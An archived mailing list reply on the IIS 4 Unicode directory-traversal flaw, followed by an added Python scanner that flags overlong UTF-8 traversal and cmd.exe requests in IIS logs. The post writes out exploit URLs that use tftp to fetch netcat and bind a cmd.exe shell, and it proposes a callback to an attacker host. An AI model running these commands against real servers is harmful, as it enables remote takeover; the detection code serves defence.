Vulnerability Development mailing list archives

Re: dos commands via iis 4 (TFTP)


From: "Bluefish (P.Magnusson)" <11a () GMX NET>
Date: Wed, 15 Nov 2000 14:01:38 +0100

http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe
So after this, there is a port open (22 in this case as many admins will
leave this open for SSH, but this is an NT box, which as we know rarely
has SSH running on it) that I can telnet to and have a command prompt.

A more reliable attack though, would be to download and execute a client
which connects to www.attacker.com:80, only port 80 won't be running a
webserver but a server for the client.

That way it will overcome more firewalls; only an application level
firewall or a closed DMZ would cause problems, whereas the attack you
describe relies on some server port not being firewalled.

..:::::::::::::::::::::::::::::::::::::::::::::::::..
     http://www.11a.nu || http://bluefish.11a.nu
    eleventh alliance development & security team

             http://www.eff.org/cafe
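The requests at the top of the thread work because IIS checked the path for `..` before decoding the overlong UTF-8 sequence `%c0%af` into `/`. A detector has to decode the same lenient way before judging the path. The following is an added example (not from the post or the list), a small scanner over constructed IIS-style log lines; the field order and the sample lines are assumptions:

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample (not from the post): IIS W3C fields date time client-ip method uri-stem uri-query
SAMPLE_LOG = """\
2000-11-15 13:59:01 203.0.113.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir
2000-11-15 13:59:05 203.0.113.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir
2000-11-15 14:00:12 198.51.100.2 GET /images/logo%20large.gif -
"""
def lenient_decode(raw: bytes) -> tuple[str, bool]:
    """Decode 2-byte UTF-8 leniently (overlong C0 AF = '/', C1 9C = '\\'); returns (text, overlong_seen)."""
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            overlong |= cp < 0x80  # a 2-byte encoding of an ASCII value is overlong
            out.append(chr(cp))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
    return "".join(out), overlong
def escapes_webroot(path: str) -> bool:
    """True if '..' segments climb above the directory the path starts in."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False
def classify_request(uri_stem: str) -> list[str]:
    # Judge the path only after lenient decoding, which is what IIS failed to do.
    decoded, overlong = lenient_decode(unquote_to_bytes(uri_stem))
    findings = ["overlong-utf8"] if overlong else []
    if escapes_webroot(decoded):
        findings.append("traversal")
    if "cmd.exe" in decoded.lower():
        findings.append("cmd.exe")
    return findings
def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    # Returns (client-ip, uri-stem, findings) for every suspicious request line.
    hits = []
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 5 and (found := classify_request(f[4])):
            hits.append((f[2], f[4], found))
    return hits
```

Plain `%`-encoding such as `%20` produces no finding; only a 2-byte sequence that decodes to an ASCII value, or a path that climbs above its starting directory after decoding, is flagged.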

